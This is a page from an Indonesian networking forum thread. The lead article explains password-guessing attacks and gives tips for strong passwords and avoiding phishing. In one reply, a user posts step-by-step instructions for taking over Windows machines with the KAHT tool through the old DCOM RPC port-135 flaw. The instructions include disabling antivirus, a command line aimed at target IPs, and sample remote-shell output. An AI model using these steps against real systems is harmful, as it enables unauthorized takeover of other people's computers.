Follow us on...
Follow us on G+ Follow us on Twitter Follow us on Facebook Watch us on YouTube
Register
Page 2 of 4 FirstFirst 1234 LastLast
Results 16 to 30 of 53
  1. mossy's Avatar
    Status
    Offline
    Member Array
    Join Date
    Apr 2008
    Location
    Jakarta, Cikarang
    Posts
    247
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0

    Jump to Comments

    Cara Membobol Password dan Solusi Menangkalnya

    52 Comments by mossy Published on 23-06-2008 20:00
    Jaman sekarang yang namanya hacker atau cracker semakin kreatif, dengan berbagai cara mereka berusaha menembus email Anda, friendster, rekening online, web site, bahkan blog.Anda tidak mau kan, kalau suatu saat profile Anda di friendster diubah oleh orang? Atau web site Anda tiba-tiba di ganti tampilannya oleh hacker / cracker ?

    Salah satu cara hacker menembus account kita adalah dengan cara menebak password. Hacker menggunakan script yang dapat memasukkan puluhan password tiap detik untuk mencoba masuk ke dalam account kita.

    Cara hacker menebak password kita antara lain dengan:

    1. Brute force attack, yaitu dengan mencoba semua kombinasi, mulai dari aaaa sampai zzzz, sampai beberapa karakter.
    2. Dictionary attack, yaitu dengan menebak menggunakan kata-kata dalam kamus, dan dikombinasikan dengan angka-angka atau karakter.
    3. Personal information attack, dengan cara memasukkan data-data pribadi seperti nomor telepon, tanggal lahir, nama pacar, kode pos, dan sebagainya.

    Password yang sangat lemah akan sangat mudah dibobol hacker dengan cara ini. Contoh password yang sangat lemah misalnya:

    * 123456, qwerty, asdf, ini karena mudah sekali orang mengetik kombinasi ini di keyboard.
    * password, mypassword, dan lain-lain yang menggunakan kata-kata dalam kamus (semua bahasa).
    * tanggal lahir, nama pacar, dan lainnya yang merupakan data diri orang tersebut.

    Password yang lemah, bisa dibobol dalam waktu yang lebih cepat, misalnya:

    * menggunakan semua huruf kecil.
    * menggunakan kombinasi kata dan angka, misalnya buku10, teroris80.
    * mengganti huruf dengan karakter, misalnya c1nt@

    Bagaimana password yang kuat dan sulit ditembus hacker?

    1. Merupakan kombinasi dari huruf besar, huruf kecil, nomor, dan karakter.
    2. Panjang lebih dari 10 karakter.
    3. Tidak menyertakan kata-kata dalam kamus.

    Password yang kuat harus mudah diingat oleh pemiliknya.

    Contoh password yang kuat: 1mAu$100Ribu

    Cara mengingatnya:

    * 1 = kata “saya” diterjemahkan dalam bahasa Inggris (I).
    * mAu = mau
    * $ = uang
    * 100Ribu = 100 ribu

    Contoh password kuat yang lain: ninG->0+1Gul

    Cara mengingatnya:

    * ninG = misalnya nama orang sepesial buat Anda: Naning
    * -> = panah identik dengan adalah
    * 0+ = lambang cewek
    * 1 =berarti nomor satu atau paling
    * Gul = gula itu manis

    Beberapa tips:

    1. Jangan menggunakan password yang sama untuk berbagai macam layanan, misalnya password email Anda sama dengan password friendster. Ini berarti:
    * seseorang yang dapat menjebol password friendster Anda, bisa juga menjebol password email Anda. Sementara di mata hacker menjebol password friendster lebih mudah daripada menjebol email Yahoo.
    * admin atau “orang dalam” friendster tahu password Anda, dia juga bisa memasukkan password tersebut ke email Anda.
    2. Jangan mengklik link di email yang menyatakan Anda harus memverifikasi password Anda. Email ini dikirim oleh hacker.
    3. Jangan memasukkan password disitus selain yang memberikan layanan. Misalnya jangan memasukkan password yahoo di situs friendster untuk alasan apapun (misalnya import address book).
    4. Sebelum login ke email atau yang lain, pastikan URL di browser Anda benar. Misalnya mail.yahoo.com bukan mail.yahoo-ltd.com atau yahoo-verify.com atau yang lain.
    5. Untuk rekening online seperti e-gold, klik BCA, paypal, sebaiknya Anda tidak mengetik password Anda lewat keyboard (karena hacker bisa membaca keyboard Anda dengan program keylogger). Gunakan On Screen Keyboard, Charakter Map, atau copy paste dari huruf acak.

    Okey begitulah tips-tips agar password kita sulit dibobol hacker. Semoga dengan tips ini account kita aman dan terhindar dari kebobolan.

    Penulis: Oka Mahendra
    Sumber :
    Click here to enlarge

  2. The Following 9 Users Say Thank You to mossy For This Useful Post:


  3. Total Comments 52

    Comments

  4. #16
    PRESCOTT
    PRESCOTT's Avatar
    Click here to enlarge Originally Posted by mossy Click here to enlarge
    iya instal ulang aja...
    klo ngejebol agak susah deh...Click here to enlarge
    klo mikrotik yg license,gmn boz?ilang dong..ad alternat yg lain g?atau mungkin kwan2 atau senior2 yg mo share, yg pernah pnya pengalaman klo kasusny ky gni?

  5. #17
    Status
    Offline
    racha5187's Avatar
    Baru Gabung
    Join Date
    Dec 2008
    Posts
    14
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    ini membobol password ap nech????

    windows kah???

  6. #18
    Status
    Offline
    racha5187's Avatar
    Baru Gabung
    Join Date
    Dec 2008
    Posts
    14
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0

    Cara Membobol Password Windows

    bole ngasi tau cara membobol password windows g nech???

    Cara membobol Password Windows

    Artikel ini bukan bertujuan untuk mengajari pembaca untuk berbuat jahat dengan cara membobol password komputer orang lain, tapi hanya sekedar mengingatkan kepada anda terutama bagi administrator jaringan atau pengguna komputer yang terkoneksi ke jaringan agar berhati-hati dan selalu waspada bahwa password /komputer anda mudah di bobol dan diambil alih oleh orang lain.
    kali ini penulis menggunakan metode explosits port 135 (DCOMRPC) dimana semenjak adanya issue virus W32 Welcia K yang menyerang port 135, yang dalam hal ini diakui oleh pihak microsoft (Baca Microsoft Security Bulletin MS03-026). target dari worm ini adalah pc yang menggunakan IIS 5.0 seperti windows 2000 /XP.

    Untuk mempersingkat bagaimana caranya kita membobol password di windows kita menggunakan Tools Kaht bisa anda download disini .
    Karena proses ini menggunakan worm sebaiknya anda mendisable antivirus anda.
    Langkahnya :
    1. Unzip file Kaht.zip
    2. Letakkan pada direktori yang anda suka.
    3. Masuk ke direktori tempat file berada melalui text mode
    4. Tentukan sasaran pc yang akan di hacking missal
    IP : 192.168.30.3
    Kaht 192.168.30.1 192.168.30.3
    Jika hacking anda berhasil akan tampil pada command line kira-kira sbb:


    KAHT II - MASSIVE RPC EXPLOIT dst
    [+] Target: 192.168.30.1-192.168.30.3 with 50 Treads
    [+] Attacking Port:135. Remote Shell at port:36388
    [+] Scan In Progress......
    - Connecting to 192.168.30.3
    Sending Exploit to a [Win2k] Server
    - Connectando con la Shell Remote
    dst........
    C:WINNTsystem32>

    Berarti anda sudah masuk ke komputer yang anda hack dan komputer sepenuhnya sudah anda kuasai. anda bisa membuat user admin membuat sharing dll
    Sekali lagi artikel ini sekedar mengingatkan kepada anda berhatihatilah dalam mengelola komputer anda terutama Administator jaringan.


    semoga bermanfaat

  7. The Following User Says Thank You to racha5187 For This Useful Post:


  8. #19
    Status
    Offline
    geonet_comp's Avatar
    Member Super Senior
    Join Date
    Aug 2007
    Posts
    527
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    wah kok jadi forum kiddies yah? Click here to enlarge

  9. #20
    Status
    Offline
    racha5187's Avatar
    Baru Gabung
    Join Date
    Dec 2008
    Posts
    14
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    Click here to enlarge Originally Posted by geonet_comp Click here to enlarge
    wah kok jadi forum kiddies yah? Click here to enlarge
    duh,,,,
    maksudnya apa nech????

  10. #21
    Status
    Offline
    john_0ng80's Avatar
    Member
    Join Date
    Sep 2007
    Posts
    286
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    mau tips paling jitu??!?
    kompnya nga usah dinyalain aja !!
    kkkkkkkkkkkkk
    bercanda2............
    pakai deep freeze lumayan kok

  11. #22
    Status
    Offline
    redebian's Avatar
    Baru Gabung
    Join Date
    Jan 2009
    Posts
    5
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    wah deepfrezee aj masih bisa dibobol bos....
    ingat "Tidak ada Systim yang 100% aman"....
    tinggal kitanya aj yang mengkonfigurasi system itu supaya sulit dibobol...Click here to enlarge

  12. #23
    Status
    Offline
    Sazax's Avatar
    Newbie
    Join Date
    Feb 2009
    Posts
    26
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    Mantab banget cooy... Belajar tidak boleh tulalit ..Click here to enlarge

  13. #24
    Status
    Offline
    geonet_comp's Avatar
    Member Super Senior
    Join Date
    Aug 2007
    Posts
    527
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    Click here to enlarge Originally Posted by racha5187 Click here to enlarge
    duh,,,,
    maksudnya apa nech????
    script kiddies... like you Click here to enlarge

  14. #25
    Status
    Offline
    networkergadungan's Avatar
    Baru Gabung
    Join Date
    Oct 2008
    Posts
    4
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    Click here to enlarge Originally Posted by rahwana Click here to enlarge
    Install ulang aja...
    iya... tuh bener banget...

    dari pada bulak balik sana sini buat cari tau jebol password..

    ya.. meningan di install ulang saja... Click here to enlarge

  15. #26
    Status
    Offline
    unique_leader's Avatar
    Member Super Senior
    Join Date
    Jul 2007
    Posts
    638
    Reviews
    Read 0 Reviews
    Downloads
    5
    Uploads
    0
    Feedback Score
    1 (100%)
    Click here to enlarge Originally Posted by racha5187 Click here to enlarge
    duh,,,,
    maksudnya apa nech????
    IGO kah!!!

  16. #27
    Status
    Offline
    yogaponsel's Avatar
    Forum Guru
    Join Date
    Oct 2008
    Location
    "BnetAkses"
    Posts
    2,511
    Reviews
    Read 0 Reviews
    Downloads
    1
    Uploads
    0
    Feedback Score
    0
    cara paling aman .... no card lan no wifi no modem ... stand alone .... aman buanget ...

  17. #28
    Status
    Offline
    mossy's Avatar
    Member
    Join Date
    Apr 2008
    Location
    Jakarta, Cikarang
    Posts
    247
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    Click here to enlarge Originally Posted by racha5187 Click here to enlarge
    ini membobol password ap nech????

    windows kah???
    Click here to enlarge

  18. #29
    Status
    Offline
    DJCom's Avatar
    Baru Gabung
    Join Date
    Jun 2009
    Posts
    3
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    nubi baca baca dulu ya.......Click here to enlarge
    makasih buat info2nya yang bermanfaat....Click here to enlarge

  19. #30
    Status
    Offline
    Anonymous's Avatar
    Newbie
    Join Date
    Nov 2008
    Location
    Dumai, Riau
    Posts
    51
    Reviews
    Read 0 Reviews
    Downloads
    1
    Uploads
    0
    Feedback Score
    0
    lha kok jadi kabur dari tema awalnya ya?
    bukan tread awalnya gimana cara bobol password di mikrotik?

    kalo gak tanya aja sama adminnya?
    kalo punya sendiri instl ulang aja lebih gampaang...Click here to enlarge

 

 
Page 2 of 4 FirstFirst 1234 LastLast

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Articles

  1. Replies: 9
    Last Post: 06-05-2009, 20:18
  2. <ask> solusi terbaik untuk point 2 multipoint ?
    By Mat Soleh in forum Wireless Networking
    Replies: 6
    Last Post: 07-07-2008, 11:40
  3. Mohon Solusi
    By zulfahmi in forum General Networking
    Replies: 1
    Last Post: 19-05-2008, 20:18
  4. ada solusi untuk ini
    By parot in forum General Networking
    Replies: 13
    Last Post: 12-02-2008, 10:24
  5. Kasi Solusi Dunk
    By Boedie in forum General Networking
    Replies: 6
    Last Post: 07-01-2008, 18:13

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
ads